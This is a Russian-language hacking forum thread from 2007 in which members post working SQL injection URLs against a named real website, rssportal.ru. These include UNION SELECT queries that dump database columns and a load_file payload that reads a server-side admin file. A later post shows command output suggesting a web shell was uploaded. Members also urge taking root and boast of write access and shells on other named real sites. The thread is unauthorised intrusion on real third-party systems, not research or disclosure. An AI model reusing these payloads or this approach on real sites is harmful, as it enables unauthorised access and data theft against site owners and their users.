HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Injection на rssportal.ru
  #1  
Старый 01.06.2007, 18:47
Micr0b
Участник форума
Регистрация: 14.01.2006
Сообщений: 242
С нами: 10695206

Репутация: 245
По умолчанию Injection на rssportal.ru

Injection на rssportal.ru

Хотелось бы отметить ету инж., так как там есть сами посмотрите что
Хотя ето не новость

Вот ищо несколько injection на етом же сайте:

Код:
http://rssportal.ru/catalog.php?rss_id=-54161+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
Код:
http://rssportal.ru/catalog.php?cat_id=-1+UNION+SELECT+1,name,3,4,5,6,7,8+FROM+category/*
Код:
http://rssportal.ru/registration.php?uid=1&confirm=blablabla'
Вот и видео: http://video.antichat.ru/download_228.html

Последний раз редактировалось Micr0b; 14.06.2007 в 17:06..
 
Ответить с цитированием

  #2  
Старый 01.06.2007, 18:55
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами: 10692266

Репутация: 3486


По умолчанию

Смотрел на ускоренном воспроизведении(: Видео не стоило снимать имхо. Инъекция стандартна. Могли простенькую шифровку пассов поставить..
PS Вот если бы ты шелл залил, был бы хоть какой то материал.
__________________
..
 
Ответить с цитированием

  #3  
Старый 02.06.2007, 02:05
wix
Новичок
Регистрация: 23.05.2007
Сообщений: 19
С нами: 9984613

Репутация: 7
По умолчанию

Код:
http://rssportal.ru/catalog.php?cat_id=-57+UNION+SELECT+1,load_file(%22/home/rss/rssagg.wrk.infostars.ru/htdocs/admin.php%22),3,4,5,6,7,8+FROM+user+WHERE+id=2/*
даж файлы читать мона)
 
Ответить с цитированием

  #4  
Старый 02.06.2007, 09:24
Sn@k3
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
С нами: 10566621

Репутация: 1198


По умолчанию

молодец микроб
 
Ответить с цитированием

  #5  
Старый 02.06.2007, 14:23
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами: 10309346

Репутация: 4303


По умолчанию

Цитата:
Вот если бы ты шелл залил, был бы хоть какой то материал
.

Linux frig 2.6.11-1.1369_FC4smp #1 SMP Thu Jun 2 23:08:39 EDT 2005 i686 i686 i386 GNU/Linux
uid=514(rss) gid=2(daemon) группы=2(daemon),99(nobody),107(rss)

Последний раз редактировалось Spyder; 02.06.2007 в 14:31..
 
Ответить с цитированием

  #6  
Старый 02.06.2007, 14:35
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами: 10692266

Репутация: 3486


По умолчанию

Цитата:
Сообщение от Spyder  
.

Linux frig 2.6.11-1.1369_FC4smp #1 SMP Thu Jun 2 23:08:39 EDT 2005 i686 i686 i386 GNU/Linux
uid=514(rss) gid=2(daemon) группы=2(daemon),99(nobody),107(rss)
Вот если бы кто нибудь рут взял
__________________
..
 
Ответить с цитированием

  #7  
Старый 02.06.2007, 14:41
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами: 10309346

Репутация: 4303


По умолчанию

на серваке кстати хостится press.webfile.ru с записью в корень сайта =)
 
Ответить с цитированием

  #8  
Старый 25.06.2007, 02:13
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,315
С нами: 10248806

Репутация: 2371


По умолчанию

Цитата:
Сообщение от Spyder  
на серваке кстати хостится press.webfile.ru с записью в корень сайта =)
На webfile.ru запись в корень сайта есть и скуль...шелл тоже там есть
 
Ответить с цитированием

  #9  
Старый 25.06.2007, 09:48
Zitt
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
С нами: 10533245

Репутация: 773


По умолчанию

Да и админка там есть )))
 
Ответить с цитированием

  #10  
Старый 25.06.2007, 09:54
kot777
Seo Pozitive
Регистрация: 13.08.2004
Сообщений: 779
С нами: 11442626

Репутация: 1635


По умолчанию

Да и приват на ачате никогда не палиться половиной ачата
__________________
ICQ 328498627

Хочешь Элитный OpenVPN за 10 у.е ?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
SQL Injection: Modes of Attack, Defence, and Why It Matters bxN5 Forum for discussion of ANTICHAT 1 09.04.2007 19:07
SQL Injection FAQ bx_N Forum for discussion of ANTICHAT 2 08.03.2007 18:48
Hacking Databases-SQL Injection Attacks Dracula4ever Комментарии к видео 4 01.02.2007 16:44
CRLF injection Electro Уязвимости 6 22.08.2006 14:28



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.